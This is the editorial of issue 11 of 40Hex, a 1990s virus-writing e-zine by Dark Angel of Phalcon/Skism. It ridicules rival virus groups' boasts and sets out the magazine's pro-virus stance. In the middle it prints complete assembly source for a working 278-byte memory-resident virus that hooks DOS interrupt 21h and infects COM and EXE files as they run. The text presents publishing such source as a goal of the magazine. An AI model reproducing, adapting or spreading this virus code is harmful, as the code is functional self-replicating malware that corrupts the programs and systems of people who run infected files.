Copy Link
Add to Bookmark
Report
40Hex Issue 11 File 001
40Hex Issue 11 Volume 3 Number 2 File 001
Life, the Universe, and 40Hex
It is apparent to even the blindest of observers that the virus
phenomenon has caught on. Everyone and his kid brother has decided to start
a virus group, whether or not they have programmers capable of creating a
viable (read: parasitic) virus. While this in itself is merely offensive,
it is the sheer arrogance of these meta-groups which is irritating. Of
course, no names will be mentioned, as that would be mean and we all wish
for a happy world.
The most common trait of these pseudo-groups is for a member to state
that all code that was written was "developed on my own." Of course, this
is seldom the case. Often, the "original source code" to their viruses
clearly originated at some point from a Sourcer disassembly. Heck, when you
see "seg_a" or "loc_0027," you know they're just poor hacks. Of course, the
the disparate coding styles in the "source" also reveals the nature of the
virus.
And when the virus is listed as a Dark Avenger hack in various anti-
virus products, the individuals persist in their self-induced fantasies,
saying their viruses are original. I suppose the anti-virus programmers,
who have disassembled countless viruses, can't spot a Dark Avenger or Murphy
hack when they see one. Stop fooling yourselves.
And these mentally challenged persons continue, insisting routine X, a
"new, innovative technique," was developed independently. Yet anyone with
even a minimal exposure to virus source code can see traces of other viruses
in these routines. Even the ideas presented are seldom new; most having
already been implemented by existing viruses. The worst of these people
magnify all of their supposed accomplishments, talking of the revolutionary
changes they single-handedly effect.
Every group goes through a phase in which they hack viruses; they
should not be proud of these viruses. But it is merely the first step and
most grow out of it. Skism-1, for example, was a Jerusalem hack. It is
ancient history. I might also point out that the Phalcon/Skism viruses
published in both the last issue and this one are far superior to Skism-1.
Phalcon/Skism does not release the source code to half-baked viruses just so
40Hex can look larger. Every virus programmer has a few experimental
viruses; yet it is not necessarily appropriate to print all of them. If I
wrote a virus which had several hundred bytes of repetitious code, I would
be ashamed to print it. It's like releasing a program which has only been
half-completed.
When a virus programmer additionally claims, "This virus was written
two years ago, so it sucks, but I'm going to release it anyway because it's
good to learn from," I have my doubts. When s/he further hurridly states,
"My other viruses are better," then my doubts grow. Where, pray tell, are
these superior viruses? Why publish that which you admit sucks? Of course,
anyone that makes such a claim, or one such as, "Next time, I'll release a
COM/EXE/SYS/MBR/OV?/DAT/DOC/TXT/ANS/ASC polymorphic, stealth infector that I
wrote last week," is suspicious.
As an example of the mindless boasting, observe the following: (Note:
the following should not be construed as a personal attack against either
the person or group in question.)
This person wrote, "As with many of my routines, stuff which took many
other virus writers a few pages of code took me one page... that's not bad!
I have many other goodies up my sleeve, like a 387-byte generic COM/EXE
parasitic infector on execution, the smallest of its kind in the WORLD...
(with room for improvement!)."
Please do not boast if you cannot substantiate your claims. For
example, these claims are easily shredded by counterexample. Let us examine
the Voronezh-370 virus. It is a generic parasitic COM/EXE infector and it
is indeed less than 387 bytes. If 387 bytes is the smallest in the world,
then this may very well be the smallest in the universe. With only two
hours of fiddling, I came up with the following virus (278 bytes), which may
yet be the smallest of its kind in all of creation! Actually, I make no
such claim, as a smaller one _can_ be written. The point was to show that
this claim was not all that impressive and was, in fact, dead wrong. Let us
not be o'erhasty to boast next time.
As with many of my viruses, stuff which took many other virus writers
over 380 bytes took me under 280... that's not bad! Humour aside, I might
point out that this virus is _over_ 100 bytes less than the boaster's
attempt, so it is _significantly_ smaller. Gee, I wonder what those extra
109 bytes are used for.
-------------Cut here----------------
.model tiny
.code
.radix 16
.code
; Phalcon/Skism _Small virus
; Written by Dark Angel of Phalcon/Skism
; 278 byte generic COM/EXE infector
EXE_ID = -40
viruslength = heap - _small
startload = 90 * 4
_small:
call relative
oldheader dw 020cdh
dw 0bh dup (0)
relative:
pop bp
push ds
push es
xor ax,ax
mov ds,ax
mov es,ax
mov di,startload
cmp word ptr ds:[di+25],di
jz exit_small
lea si,[bp-3]
mov cx,viruslength
db 2Eh
rep movsb
mov di,offset old21 + startload
mov si,21*4
push si
movsw
movsw
pop di
mov ax,offset int21 + startload
stosw
xchg ax,cx
stosw
exit_small:
pop es
pop ds
or sp,sp
jnp returnCOM
returnEXE:
mov ax,ds
add ax,10
add [bp+16],ax
add ax,[bp+0e]
mov ss,ax
mov sp,cs:[bp+10]
jmp dword ptr cs:[bp+14]
returnCOM:
mov di,100
push di
mov si,bp
movsw
movsb
ret
infect:
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
mov ax,3d02
int 21
xchg ax,bx
push cs
pop ds
push cs
pop es
mov si,offset oldheader+startload
mov ah,3f
mov cx,18
push cx
mov dx,si
int 21
cmp ax,cx
jnz go_already_infected
mov di,offset target + startload
push di
rep movsb
pop di
mov ax,4202
cwd
int 21
cmp ds:[di],'ZM'
jz infectEXE
sub ax,3
mov byte ptr ds:[di],0e9
mov ds:[di+1],ax
sub ax,viruslength
cmp ds:[si-17],ax
jnz finishinfect
go_already_infected:
pop cx
jmp short already_infected
int21:
cmp ax,4b00
jz infect
jmp short chain
infectEXE:
cmp word ptr [di+10],EXE_ID
jz go_already_infected
push ax
push dx
add ax,viruslength
adc dx,0
mov cx,200
div cx
or dx,dx
jz nohiccup
inc ax
nohiccup:
mov ds:[di+4],ax
mov ds:[di+2],dx
pop dx
pop ax
mov cx,10
div cx
sub ax,ds:[di+8]
mov ds:[di+14],dx
mov ds:[di+16],ax
mov ds:[di+0e],ax
mov word ptr ds:[di+10],EXE_ID
finishinfect:
mov ah,40
mov cx,viruslength
mov dx,startload
int 21
mov ax,4200
xor cx,cx
cwd
int 21
mov ah,40
mov dx,di
pop cx
int 21
already_infected:
mov ah,3e
int 21
exitinfect:
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
chain:
db 0ea
heap:
old21 dw ?, ?
target dw 0ch dup (?)
endheap:
end _small
-------------------------------------
I think the informed virus and anti-virus person recognises these
claims as the baseless boasts they are. Let me assure you that you will see
none of that in 40Hex.
Finally, each new group proclaims to be the world's predominant virus
group. Each new group puts out a magazine. Each new group presents H/P/A
articles in their magazines. Let us go through each one step by step.
Hacking. Gee, can't you see the connection with viruses? Phreaking. Got
some c0deZ, d00d? Anarchy. Gee, I want total chaos even though I probably
couldn't survive such a situation. H/P/A aside, these "virus magazines" do
indeed contain some virus-related articles. Generally, these are of the
form "X virus is great, but we won't give source. X does this, it does
that, it is not a hack of Dark Avenger even though it scans as such." Some
articles give Sourcer disassemblies -- hardly commented, yet termed
disassemblies nonetheless. Finally, there are the programming articles
containing tips and tricks from the "masters." These often contain
nonworking code. These often contain factual errors. These often are
nothing but a waste of time.
Does this sound elitist? I hope not. Judge virus groups and their
magazines on their merits, not on their hype. Do not take a virus group's
word as gospel; it seldom reflects the truth. Instead, do some
investigation on your own and try to verify (or refute) their claims. You
may be surprised at the results. There is also no reason to immediately
condemn all anti-virus people as corrupt and "lame"; many are just ordinary
people "on the other side." The virus scene is becoming less innovative as
these new quasi-groups emerge. This apparent contradiction must end soon.
We ask all groups to end the self-back-patting and blatant lying and do some
real work.
Finally, a short summary of 40Hex is in order, for both new and old
readers alike. The paragraphs below show the current editorial stance and
opinion of 40Hex, which has evolved during the several years of its
existence. What holds true for 40Hex also applies to Phalcon/Skism.
40Hex is _not_ a magazine for self-congratulation. Although put out by
Phalcon/Skism, 40Hex serves as medium through which the public may hear the
voice of the informed virus community without magnification of either the
achievements or failures of any particular virus group or programmer.
Although the 40Hex staff offers opinions from the pro-virus standpoint,
40Hex is not an anti-anti-virus magazine. There is a clear distinction
between pro- and anti-anti-virus. 40Hex encourages anti-virus researchers
to contribute. 40Hex offers a fair, unbiased view except in editorials,
which obviously reflect the opinions of the authors.
40Hex _is_ purely a virus magazine -- none of that H/P/A/k-rad stuff.
Illegal and anarchistic activities are not condoned by 40Hex and, as such,
these topics are not appropriate for inclusion in the magazine. The public
distribution of quality virus source code and virus writing techniques, both
old and new, is one of the predominant goals of 40Hex, serving to inform
both the pro- and anti-virus community. The secondary function of the
magazine is to spread virus-related news. 40Hex is concerned more with
content than size. You know the old saw "Quality, not quantity." Other
magazines appear larger than they truly are because each article is padded
to 80 columns, effectively doubling its file length.
40Hex articles are _not_ mere rehashes of what has already been
printed. Other magazines have presented articles which closely mirror those
already published in 40Hex. Such poorly rewritten articles are neither
enlightening nor necessary.
40Hex is _not_ a tool with which people wreak havok upon others'
systems. This is simply an unfair view of the magazine. In fact, 40Hex is
against wanton destruction of computer systems. Viruses are so prevalent
nowadays that anyone can obtain them with little difficulty. They also need
not obtain 40Hex to be able to type "FORMAT C:" Knobs will be knobs.
40Hex _is_ a public forum, allowing those who take the time to write to
have their opinions published. We encourage all to send letters to 40Hex,
as they provide valuable insight into the virus and anti-virus communities
from a fresh perspective.
40Hex is _not_ inherently evil. What you choose to do with the
knowledge provided is your business.
Once again, 40Hex does not condone the illegal spread of viruses. Such
actions are frowned upon. Our stance has evolved over the years, so don't
bring up something from 40Hex-2 and cry hippocrite -- unless, of course, you
have a closed mind and absolutely nothing else to say.
-- Dark Angel
Phalcon/Skism